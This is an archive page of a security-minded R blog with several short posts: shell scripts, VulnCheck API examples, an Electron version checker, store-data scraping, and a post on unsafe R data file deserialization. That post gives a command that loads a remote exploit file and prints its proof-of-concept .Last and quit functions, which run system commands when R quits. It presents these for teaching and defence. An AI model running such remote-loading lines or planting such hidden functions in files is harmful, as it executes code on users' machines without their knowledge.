Skip navigation

Author Archives: hrbrmstr

Don't look at me…I do what he does — just slower. #rstats avuncular • ?Resistance Fighter • Cook • Christian • [Master] Chef des Données de Sécurité @ @rapid7

Short post just to get the internets to index that I posted a repo with a small Bash script I’ve been using to resolve Bluesky/ATproto handles (like hrbrmstr.dev) to did:plc identifiers. Not sure why I did do this ages ago tbh.

Code is here but it’s small enough to include inline as well:

#!/usr/bin/env bash

set -euo pipefail

# Function to resolve Bluesky handle to DID:PLC
resolve_bluesky_handle() {
  local handle="${1:-}"

  # Remove leading '@' if present
  handle=$(echo "${handle}" | sed -e 's/^@//')

  # Check if curl is installed
  if ! command -v curl &>/dev/null; then
    echo "Error: curl is not installed."
    return 1
  fi

  # Check if jq is installed
  if ! command -v jq &>/dev/null; then
    echo "Error: jq is not installed."
    return 1
  fi

  api_url="https://bsky.social/xrpc/com.atproto.identity.resolveHandle"
  response=$(curl --silent --header "Accept: application/json" "${api_url}?handle=${handle}")

  # Check if the curl command was successful
  if [[ $? -ne 0 ]]; then
    echo "Error: Failed to fetch data from Bluesky API."
    return 1
  fi

  # Extract the DID from the response
  did=$(echo "${response}" | jq -r '.did')

  # Check if jq command was successful
  if [[ $? -ne 0 ]]; then
    echo "Error: Failed to parse JSON response."
    return 1
  fi

  # Check if DID is empty
  if [[ -z "${did}" ]]; then
    echo "Error: DID not found in the response."
    return 1
  fi

  echo "${did}"
}

# Check if exactly one argument is provided
if [[ $# -ne 1 ]]; then
  echo "Usage: $0 <handle>"
  exit 1
fi

resolve_bluesky_handle "${1}"

I had not planned to blog this (this is an incredibly time-crunched week for me) but CERT/CC and CISA made a big deal out of a non-vulnerability in R, and it’s making the round on socmed, so here we are.

A security vendor decided to try to get some hype before 2024 RSAC and made a big deal out of what was/is known expected behavior in R data files. R Core took some measures to address the issue they outlined, but for the love of Henry, PLEASE do not think R data files are safe to handle if you weren’t the one creating them, or you do not fully know the provenance of them.

Konrad Rudolph and Iakov Davydov did some ace cyber sleuthing and figured out other ways R data file deserialization can be abused. Please take a moment and drop a note on Mastodon to them saying “thank you”. This is excellent work. We need more folks like them in this ecosystem.

Like many programming languages, R has many footguns, and R data files are one of them. R objects are wonderful beasts, and being able to serialize and deserialize those beasts is a super helpful bit of functionality. Also, R has something called active bindings. Amongst other things, they let you access an object to get a value, but — in doing so — code can get executed without you knowing it. Whether an R data file has an object with active bindings or not, it can be abused by attackers.

When you load() an R data file directly into your R session and into the global environment, the object(s) in it will, well, load there. So, if it has an object named print that’s going to be in your global environment and get called when print() gets called. Lather/rinse/repeat for any other object name. It should be pretty obvious how this could be abused.

A tad more insidious is what happens when you quit R. By default, on quit(), unless you specify otherwise, that function invocation will also call .Last() if it exists in the environment. This functionality exists in the event things need to be cleaned up. One “nice” aspect of .-prefixed R objects is that they’re hidden by default from the environment. So, you may not even notice if an R data file you’ve loaded has that defined. (You likely do not check what’s loaded anyway.)

It’s also possible to create custom R objects that have their own “finalizers” (ref reg.finalizer), which will also get called by default when the objects are being destroyed on quit.

There are also likely other ways to trigger unwanted behavior.

If you want to see how this works, start R from RStudio, the command line, or R GUI. Then, execute the following R code:

load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))

Then, quit R/RStudio/R GUI (this will be less dramatic on linux, but the demo should still be effective).

If you must take in untrusted R data files, keep reading.

I threw together an R script along with a safer way to use it (a Docker container) to help R folks inspect the contents of R data files before actually using them. It also looks for some basic shady stuff and alerts you if it finds them. It’s a WIP, and issues + thoughtful PRs are welcome.

If one were to run Rscript check.R from that repo with that exploit.rda file as a parameter, one would see this:

-----------------------------------------------
Loading R data file in quarantined environment…
-----------------------------------------------

Loading objects:
  .Last
  quit

-----------------------------------------
Enumerating objects in loaded R data file
-----------------------------------------

.Last : function (...)  
 - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6
  ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48> 
quit : function (...)  
 - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6
  ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48> 

------------------------------------
Functions found: enumerating sources
------------------------------------

Checking `.Last`…

!! `.Last` may execute arbitrary code on your system under certain conditions !!

`.Last` source:
{
    cmd = if (.Platform$OS.type == "windows") 
        "calc.exe"
    else if (grepl("^darwin", version$os)) 
        "open -a Calculator.app"
    else "echo pwned\\!"
    system(cmd)
}


Checking `quit`…

!! `quit` may execute arbitrary code on your system under certain conditions !!

`quit` source:
{
    cmd = if (.Platform$OS.type == "windows") 
        "calc.exe"
    else if (grepl("^darwin", version$os)) 
        "open -a Calculator.app"
    else "echo pwned\\!"
    system(cmd)
}

There’s info in the repo on how to use that with Docker.

FIN

The big takeaway is (again) to not trust R data files you did not create or know the full provenance of. If you have an internet-facing Shiny app or Plumber API that takes R data files as input, get it off the internet and figure out some other way to take in the input.

While I fully disagree with the assignment of the CVE, I’m at least glad this situation brought attention to this very dangerous aspect of handling this type of file format in R.

I use Fantastical as it’s a much cleaner and native interface than Google Calendar, which I’m stuck using.

I do like to use the command line more than GUIs and, while I have other things set up to work with Google Calendar from the CLI, I’ve always wanted to figure out how to pull data from Fantastical to it.

So, I figured out a shortcut + Bash script combo to do that, and posted it into the box below. The link to the shortcut is in the comments of the script.

#!/usr/bin/env bash

# Changelog:
#
# 2024-03-23: Script created for scheduling tasks on macOS.
#             Added error handling, usage information, and best practices.

# Usage:
#
# This script is intended to be used for getting the day's schedule from Fantastical
# It takes an optional date parameter in the format YYYY-MM-DD and uses the
# macOS 'shortcuts' command to run a scheduling query task. If no date is provided,
# or if the provided date is invalid, it defaults to today's date.
#
# Shortcut URL: https://www.icloud.com/shortcuts/7dc5cf4801394d05b9a71e5044fbf461

# Exit immediately if a command exits with a non-zero status.
set -o errexit
# Make sure the exit status of a pipeline is the status of the last command to exit with a non-zero status, or zero if no command exited with a non-zero status.
set -o pipefail

# Function to clean up temporary files before script exits
cleanup() {
    rm -f "${SAVED}" "${OUTPUT}"
}

# Trap to execute the cleanup function on script exit
trap cleanup EXIT

# Check if a date parameter is provided
if [ "$1" ]; then
    INPUT_DATE=$(date -j -f "%Y-%m-%d" "$1" "+%Y-%m-%d" 2>/dev/null) || {
        echo "Invalid date format. Please use YYYY-MM-DD. Defaulting to today's date." >&2
        INPUT_DATE=$(date "+%Y-%m-%d")
    }
else
    INPUT_DATE=$(date "+%Y-%m-%d")
fi

# Create temporary files for saving clipboard contents and output
SAVED=$(mktemp)
OUTPUT=$(mktemp)

# Save current clipboard contents
pbpaste >"${SAVED}"

# Copy the input date to the clipboard
echo "${INPUT_DATE}" | pbcopy

# Run the 'sched' shortcut
shortcuts run "sched"

# Save the output from the 'sched' shortcut
pbpaste >"${OUTPUT}"

# Restore the original clipboard contents
pbcopy <"${SAVED}"

# Display the output from the 'sched' shortcut
cat "${OUTPUT}"

VulnCheck has some new, free API endpoints for the cybersecurity community.

Two extremely useful ones are for their extended version of CISA’s KEV, and an in-situ replacement for NVD’s sad excuse for an API and soon-to-be-removed JSON feeds.

There are two ways to work with these APIs. One is retrieve a “backup” of the entire dataset as a ZIP file, and the other is to use the API to retrieve individual CVEs from each “index”.

You’ll need a free API key from VulnCheck to use these APIs.

All code shown makes the assumption that you’ve stored your API key in an environment variable named VULNCHECK_API_KEY.

After the curl examples, there’s a section on a small Golang CLI I made to make it easier to get combined extended KEV and NVDv2 CVE information in one CLI call for a given CVE.

Backups

Retrieving the complete dataset is a multi-step process. First you make a call to the specific API endpoint for each index to backup. That returns some JSON with a temporary, AWS pre-signed URL (a method to grant temporary access to files stored in AWS S3) to download the ZIP file. Then you download the ZIP file, and finally you extract the contents of the ZIP file into a directory. The output is different for the NVDv2 and extended KEV indexes, but the core process is the same.

NVDv2

Here’s a curl idiom for the NVDv2 index backup. The result is a directory of uncompressed JSON that’s in the same format as the NVDv2 JSON feeds.

# Grab the temporary AWS pre-signed URL for the NVDv2 index and then download the ZIP file.
curl \
  --silent \
  --output vcnvd2.zip --url "$(
    curl \
      --silent \
      --cookie "token=${VULNCHECK_API_KEY}" \
      --header 'Accept: application/json' \
      --url "https://api.vulncheck.com/v3/backup/nist-nvd2" | jq -r '.data[].url'
    )"

rm -rf ./nvd2

# unzip it
unzip -q -o -d ./nvd2 vcnvd2.zip

# uncompress the JSON files
ls ./nvd2/*gz | xargs gunzip

tree ./nvd2
./nvd2
├── nvdcve-2.0-000.json
├── nvdcve-2.0-001.json
├── nvdcve-2.0-002.json
├── nvdcve-2.0-003.json
├── nvdcve-2.0-004.json
├── nvdcve-2.0-005.json
├── nvdcve-2.0-006.json
├── nvdcve-2.0-007.json
├── nvdcve-2.0-008.json
├── nvdcve-2.0-009.json
├── nvdcve-2.0-010.json
├── nvdcve-2.0-011.json
├── nvdcve-2.0-012.json
├── nvdcve-2.0-013.json
├── nvdcve-2.0-014.json
├── nvdcve-2.0-015.json
├── nvdcve-2.0-016.json
├── nvdcve-2.0-017.json
├── nvdcve-2.0-018.json
├── nvdcve-2.0-019.json
├── nvdcve-2.0-020.json
├── nvdcve-2.0-021.json
├── nvdcve-2.0-022.json
├── nvdcve-2.0-023.json
├── nvdcve-2.0-024.json
├── nvdcve-2.0-025.json
├── nvdcve-2.0-026.json
├── nvdcve-2.0-027.json
├── nvdcve-2.0-028.json
├── nvdcve-2.0-029.json
├── nvdcve-2.0-030.json
├── nvdcve-2.0-031.json
├── nvdcve-2.0-032.json
├── nvdcve-2.0-033.json
├── nvdcve-2.0-034.json
├── nvdcve-2.0-035.json
├── nvdcve-2.0-036.json
├── nvdcve-2.0-037.json
├── nvdcve-2.0-038.json
├── nvdcve-2.0-039.json
├── nvdcve-2.0-040.json
├── nvdcve-2.0-041.json
├── nvdcve-2.0-042.json
├── nvdcve-2.0-043.json
├── nvdcve-2.0-044.json
├── nvdcve-2.0-045.json
├── nvdcve-2.0-046.json
├── nvdcve-2.0-047.json
├── nvdcve-2.0-048.json
├── nvdcve-2.0-049.json
├── nvdcve-2.0-050.json
├── nvdcve-2.0-051.json
├── nvdcve-2.0-052.json
├── nvdcve-2.0-053.json
├── nvdcve-2.0-054.json
├── nvdcve-2.0-055.json
├── nvdcve-2.0-056.json
├── nvdcve-2.0-057.json
├── nvdcve-2.0-058.json
├── nvdcve-2.0-059.json
├── nvdcve-2.0-060.json
├── nvdcve-2.0-061.json
├── nvdcve-2.0-062.json
├── nvdcve-2.0-063.json
├── nvdcve-2.0-064.json
├── nvdcve-2.0-065.json
├── nvdcve-2.0-066.json
├── nvdcve-2.0-067.json
├── nvdcve-2.0-068.json
├── nvdcve-2.0-069.json
├── nvdcve-2.0-070.json
├── nvdcve-2.0-071.json
├── nvdcve-2.0-072.json
├── nvdcve-2.0-073.json
├── nvdcve-2.0-074.json
├── nvdcve-2.0-075.json
├── nvdcve-2.0-076.json
├── nvdcve-2.0-077.json
├── nvdcve-2.0-078.json
├── nvdcve-2.0-079.json
├── nvdcve-2.0-080.json
├── nvdcve-2.0-081.json
├── nvdcve-2.0-082.json
├── nvdcve-2.0-083.json
├── nvdcve-2.0-084.json
├── nvdcve-2.0-085.json
├── nvdcve-2.0-086.json
├── nvdcve-2.0-087.json
├── nvdcve-2.0-088.json
├── nvdcve-2.0-089.json
├── nvdcve-2.0-090.json
├── nvdcve-2.0-091.json
├── nvdcve-2.0-092.json
├── nvdcve-2.0-093.json
├── nvdcve-2.0-094.json
├── nvdcve-2.0-095.json
├── nvdcve-2.0-096.json
├── nvdcve-2.0-097.json
├── nvdcve-2.0-098.json
├── nvdcve-2.0-099.json
├── nvdcve-2.0-100.json
├── nvdcve-2.0-101.json
├── nvdcve-2.0-102.json
├── nvdcve-2.0-103.json
├── nvdcve-2.0-104.json
├── nvdcve-2.0-105.json
├── nvdcve-2.0-106.json
├── nvdcve-2.0-107.json
├── nvdcve-2.0-108.json
├── nvdcve-2.0-109.json
├── nvdcve-2.0-110.json
├── nvdcve-2.0-111.json
├── nvdcve-2.0-112.json
├── nvdcve-2.0-113.json
├── nvdcve-2.0-114.json
├── nvdcve-2.0-115.json
├── nvdcve-2.0-116.json
├── nvdcve-2.0-117.json
├── nvdcve-2.0-118.json
├── nvdcve-2.0-119.json
├── nvdcve-2.0-120.json
└── nvdcve-2.0-121.json

1 directory, 122 files

VulnCheck’s Extended KEV

Here’s a curl idiom for the extended KEV index backup. The result is a directory with a single uncompressed JSON that’s in an extended format of what’s in the CISA KEV JSON.s

# Grab the temporary AWS pre-signed URL for the NVDv2 index and then download the ZIP file.
curl \
  --silent \
  --output vckev.zip --url "$(
    curl \
      --silent \
      --cookie "token=${VULNCHECK_API_KEY}" \
      --header 'Accept: application/json' \
      --url "https://api.vulncheck.com/v3/backup/vulncheck-kev" | jq -r '.data[].url'
    )"

rm -rf ./vckev

# unzip it
unzip -q -o -d ./vckev vckev.zip

tree ./vckev
./vckev
└── vulncheck_known_exploited_vulnerabilities.json

1 directory, 1 file

Retrieving Information On Individual CVEs

While there are other, searchable fields for each index, the primary use case for most of us is getting information on individual CVEs. The API calls are virtually identical, apart from the selected index.

NOTE: the examples pipe the output through jq to make the API results easier to read.

NVDv2

curl \
  --silent \
  --cookie "token=${VULNCHECK_API_KEY}" \
  --header 'Accept: application/json' \
  --url "https://api.vulncheck.com/v3/index/nist-nvd2?cve=CVE-2024-23334" | jq
{
  "_benchmark": 0.056277,
  "_meta": {
    "timestamp": "2024-03-23T08:47:17.940032202Z",
    "index": "nist-nvd2",
    "limit": 100,
    "total_documents": 1,
    "sort": "_id",
    "parameters": [
      {
        "name": "cve",
        "format": "CVE-YYYY-N{4-7}"
      },
      {
        "name": "alias"
      },
      {
        "name": "iava",
        "format": "[0-9]{4}[A-Z-0-9]+"
      },
      {
        "name": "threat_actor"
      },
      {
        "name": "mitre_id"
      },
      {
        "name": "misp_id"
      },
      {
        "name": "ransomware"
      },
      {
        "name": "botnet"
      },
      {
        "name": "published"
      },
      {
        "name": "lastModStartDate",
        "format": "YYYY-MM-DD"
      },
      {
        "name": "lastModEndDate",
        "format": "YYYY-MM-DD"
      }
    ],
    "order": "desc",
    "page": 1,
    "total_pages": 1,
    "max_pages": 6,
    "first_item": 1,
    "last_item": 1
  },
  "data": [
    {
      "id": "CVE-2024-23334",
      "sourceIdentifier": "security-advisories@github.com",
      "vulnStatus": "Modified",
      "published": "2024-01-29T23:15:08.563",
      "lastModified": "2024-02-09T03:15:09.603",
      "descriptions": [
        {
          "lang": "en",
          "value": "aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present.  Disabling follow_symlinks and using a reverse proxy are encouraged mitigations.  Version 3.9.2 fixes this issue."
        },
        {
          "lang": "es",
          "value": "aiohttp es un framework cliente/servidor HTTP asíncrono para asyncio y Python. Cuando se utiliza aiohttp como servidor web y se configuran rutas estáticas, es necesario especificar la ruta raíz para los archivos estáticos. Además, la opción 'follow_symlinks' se puede utilizar para determinar si se deben seguir enlaces simbólicos fuera del directorio raíz estático. Cuando 'follow_symlinks' se establece en Verdadero, no hay validación para verificar si la lectura de un archivo está dentro del directorio raíz. Esto puede generar vulnerabilidades de directory traversal, lo que resulta en acceso no autorizado a archivos arbitrarios en el sistema, incluso cuando no hay enlaces simbólicos presentes. Se recomiendan como mitigaciones deshabilitar follow_symlinks y usar un proxy inverso. La versión 3.9.2 soluciona este problema."
        }
      ],
      "references": [
        {
          "url": "https://github.com/aio-libs/aiohttp/commit/1c335944d6a8b1298baf179b7c0b3069f10c514b",
          "source": "security-advisories@github.com",
          "tags": [
            "Patch"
          ]
        },
        {
          "url": "https://github.com/aio-libs/aiohttp/pull/8079",
          "source": "security-advisories@github.com",
          "tags": [
            "Patch"
          ]
        },
        {
          "url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-5h86-8mv2-jq9f",
          "source": "security-advisories@github.com",
          "tags": [
            "Exploit",
            "Mitigation",
            "Vendor Advisory"
          ]
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ICUOCFGTB25WUT336BZ4UNYLSZOUVKBD/",
          "source": "security-advisories@github.com"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXWVZIVAYWEBHNRIILZVB3R3SDQNNAA7/",
          "source": "security-advisories@github.com",
          "tags": [
            "Mailing List"
          ]
        }
      ],
      "metrics": {
        "cvssMetricV31": [
          {
            "source": "nvd@nist.gov",
            "type": "Primary",
            "cvssData": {
              "version": "3.1",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
              "attackVector": "NETWORK",
              "attackComplexity": "LOW",
              "privilegesRequired": "NONE",
              "userInteraction": "NONE",
              "scope": "UNCHANGED",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "NONE",
              "availabilityImpact": "NONE",
              "baseScore": 7.5,
              "baseSeverity": "HIGH"
            },
            "exploitabilityScore": 3.9,
            "impactScore": 3.6
          },
          {
            "source": "security-advisories@github.com",
            "type": "Secondary",
            "cvssData": {
              "version": "3.1",
              "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
              "attackVector": "NETWORK",
              "attackComplexity": "HIGH",
              "privilegesRequired": "NONE",
              "userInteraction": "NONE",
              "scope": "UNCHANGED",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "NONE",
              "availabilityImpact": "NONE",
              "baseScore": 5.9,
              "baseSeverity": "MEDIUM"
            },
            "exploitabilityScore": 2.2,
            "impactScore": 3.6
          }
        ]
      },
      "weaknesses": [
        {
          "source": "security-advisories@github.com",
          "type": "Primary",
          "description": [
            {
              "lang": "en",
              "value": "CWE-22"
            }
          ]
        }
      ],
      "configurations": [
        {
          "nodes": [
            {
              "operator": "OR",
              "cpeMatch": [
                {
                  "vulnerable": true,
                  "criteria": "cpe:2.3:a:aiohttp:aiohttp:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "1.0.5",
                  "versionEndExcluding": "3.9.2",
                  "matchCriteriaId": "CC18B2A9-9D80-4A6E-94E7-8FC010D8FC70"
                }
              ]
            }
          ]
        },
        {
          "nodes": [
            {
              "operator": "OR",
              "cpeMatch": [
                {
                  "vulnerable": true,
                  "criteria": "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*",
                  "matchCriteriaId": "B8EDB836-4E6A-4B71-B9B2-AA3E03E0F646"
                }
              ]
            }
          ]
        }
      ],
      "_timestamp": "2024-02-09T05:33:33.170054Z"
    }
  ]
}

VulnCheck’s Extended KEV

curl \
  --silent \
  --cookie "token=${VULNCHECK_API_KEY}" \
  --header 'Accept: application/json' \
  --url "https://api.vulncheck.com/v3/index/vulncheck-kev?cve=CVE-2024-23334" | jq
{
  "_benchmark": 0.328855,
  "_meta": {
    "timestamp": "2024-03-23T08:47:41.025967418Z",
    "index": "vulncheck-kev",
    "limit": 100,
    "total_documents": 1,
    "sort": "_id",
    "parameters": [
      {
        "name": "cve",
        "format": "CVE-YYYY-N{4-7}"
      },
      {
        "name": "alias"
      },
      {
        "name": "iava",
        "format": "[0-9]{4}[A-Z-0-9]+"
      },
      {
        "name": "threat_actor"
      },
      {
        "name": "mitre_id"
      },
      {
        "name": "misp_id"
      },
      {
        "name": "ransomware"
      },
      {
        "name": "botnet"
      },
      {
        "name": "published"
      },
      {
        "name": "lastModStartDate",
        "format": "YYYY-MM-DD"
      },
      {
        "name": "lastModEndDate",
        "format": "YYYY-MM-DD"
      },
      {
        "name": "pubStartDate",
        "format": "YYYY-MM-DD"
      },
      {
        "name": "pubEndDate",
        "format": "YYYY-MM-DD"
      }
    ],
    "order": "desc",
    "page": 1,
    "total_pages": 1,
    "max_pages": 6,
    "first_item": 1,
    "last_item": 1
  },
  "data": [
    {
      "vendorProject": "aiohttp",
      "product": "aiohttp",
      "shortDescription": "aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present.  Disabling follow_symlinks and using a reverse proxy are encouraged mitigations.  Version 3.9.2 fixes this issue.",
      "vulnerabilityName": "aiohttp aiohttp Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')",
      "required_action": "Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.",
      "knownRansomwareCampaignUse": "Known",
      "cve": [
        "CVE-2024-23334"
      ],
      "vulncheck_xdb": [
        {
          "xdb_id": "231b48941355",
          "xdb_url": "https://vulncheck.com/xdb/231b48941355",
          "date_added": "2024-02-28T22:30:21Z",
          "exploit_type": "infoleak",
          "clone_ssh_url": "git@github.com:ox1111/CVE-2024-23334.git"
        },
        {
          "xdb_id": "f1d001911304",
          "xdb_url": "https://vulncheck.com/xdb/f1d001911304",
          "date_added": "2024-03-19T16:28:56Z",
          "exploit_type": "infoleak",
          "clone_ssh_url": "git@github.com:jhonnybonny/CVE-2024-23334.git"
        }
      ],
      "vulncheck_reported_exploitation": [
        {
          "url": "https://cyble.com/blog/cgsi-probes-shadowsyndicate-groups-possible-exploitation-of-aiohttp-vulnerability-cve-2024-23334/",
          "date_added": "2024-03-15T00:00:00Z"
        }
      ],
      "date_added": "2024-03-15T00:00:00Z",
      "_timestamp": "2024-03-23T08:27:47.861266Z"
    }
  ]
}

vccve

There’s a project on Codeberg that has code and binaries for macOS, Linux, and Windows for a small CLI that gets you combined extended KEV and NVDv2 information all in one call.

The project README has examples and installation instructions.

If you’re on Fosstodon, please pop a note to the admins there to ban this blog as well (it’s using the WordPress federation features). We would not want their sensitive sensibilities to be offended by equally “offensive” stuff I have and will post here, as I seem to have done via @hrbrmstr (which they’ve banned without recourse).

I had thought most folks likely knew this already, but if you are a user of RStudio dailies (this may apply to regular RStudio, but I only use the dailies) and are missing ligatures in the editor (for some fonts), the “fix” is pretty simple (some misguided folks think ligatures are daft).

RStudio, like VS Code and many other editors/apps, is just a special purpose web browser. That means ligatures are controlled via CSS. RStudio also supports themes. There are many built-in themes. I use this third-party one. We can use these themes to sneak in some CSS that gives you granular control over ligatures.

The CSS class we need to target is .ace_scroller. That’s the contents of the editor pane, console, and any other monospaced “scrolled text” components. If you’re wondering, “Why …ace…?”_, that’s die to RStudio’s use of the Ace editor component. Say all the nice things you want to about the Monaco editor component used by VS Code (et al.), but the wizards at Posit wield Ace better than I’ve seen any other app dev team.

You can start here to learn about all the ways you can, and, may need to customize ligatures, but the following worked for my new fav font family:

.ace_scroller {
  font-variant-ligatures: discretionary-ligatures;
  font-feature-settings: "dlig" 1;
}

There are many possible values for font-variant-ligatures, and you can fully customize the font-feature-settings to target only the ligatures you want (for example, the previous linked font has eight stylistic sets).

UPDATE

sailm-b has forked and is maintaining a more updated version of rscodeio.

FIN

If you were missing out before, hopefully this brings you back into the ligature fold.

If you’ve got 👀 on this blog (directly, or via syndication) you’d have to have been living under a rock to not know about the libwebp supply chain disaster. An unfortunate casualty of inept programming just happened to be any app in the Electron ecosystem that doesn’t undergo bleeding-edge updates.

Former cow-orker Tom Sellers (one of the best humans in cyber) did a great service to the macOS user community with tips on how to stay safe on macOS. His find + strings + grep combo was superbly helpful and I hope many macOS users did the command line dance to see how negligent their app providers were/are.

But, you still have to know what versions are OK and which ones are not to do that dance. And, having had yet-another immune system invasion (thankfully, not COVID, again) on top of still working through long COVID (#protip: you may be over the pandemic, but I guarantee it’s not done with you/us for a while) which re-sapped mobility energy, I put my sedentary time to less woesome use by hacking together a small, Golang macOS CLI to help ferret out bad Electron-based apps you may have installed.

I named it positron, since that’s kind of the opposite of Electron, and I was pretty creativity-challenged today.

It does virtually the same thing as Tom’s strings and grep does, just in a single, lightweight, universal, signed macOS binary.

When I ran it after the final build, all my Electron-based apps were 🔴. After deleting some, and updating others, this is my current status:

$ find /Applications -type f -name "*Electron Framework*" -exec ./positron "{}" \;
/Applications/Signal.app: Chrome/114.0.5735.289 Electron/25.8.4 🟢
/Applications/Keybase.app: Chrome/87.0.4280.141 Electron/11.5.0 🔴
/Applications/Raindrop.io.app: Chrome/102.0.5005.167 Electron/19.0.17 🔴
/Applications/1Password.app: Chrome/114.0.5735.289 Electron/25.8.1 🟢
/Applications/Replit.app: Chrome/116.0.5845.188 Electron/26.2.1 🟢
/Applications/lghub.app: Chrome/104.0.5112.65 Electron/20.0.0 🔴

It’s still on you to do the find (cooler folks run fd) since I’m not about to write a program that’ll rummage across your SSDs or disc drives, but it does all the MachO inspection internally, and then also does the SemVer comparison to let you know which apps still suck at keeping you safe.

FWIW, the Keybase folks did accept a PR for the libwebp thing, but darned if I will spend any time building it (I don’t run it anymore, anyway, so I should just delete it).

The aforementioned signed, universal, macOS binary is in the GitLab releases.

Stay safe out there!

Rite-Aid closed 60+ stores in 2021. They said they’d nuke over 1,000 of them over three years, back in 2022. And, they’re now about to close ~500 due to bankruptcy.

FWIW Heyward Donigan, Former President and CEO — in 2023 — took home $1,043,713 in cash, $7,106,993 in equity, and $617,105 in “other” (total $8,767,811) for this fine, bankrupt leadership. Lots of other got lots too for being incompetent.

Rite-Aid is under no obligation to provide a list to the public, nor to do any overt announcements regarding the closures.

Each closure has the potential to create or exacerbate food and pharmacy deserts in many regions.

You can get individual stores (like this one), but there’s over 2,100 of them, so doing this manually is a non-starter.

Thus, I threw together a couple of R and bash scripts to help real data journalists out, in the event any of them can pry themselves away from the POTUS horse race.

One R script is to get the individual store URLs. The bash script is used to polittely get all 2,100+ store pages (I have a script I just re-use for things like this). The other R script is used to get the JSON that’s tucked away in the HTML files to get the store info, which includes latitude, longitude, store number, and address (there is more data in there, I just pulled those fields).

The map at the top of the post is just there for kicks.

The repo is also mirrored to my GitHub (sub out ‘hub’ for ‘lab’ in the URL) if you really need to bow down to Microsoft.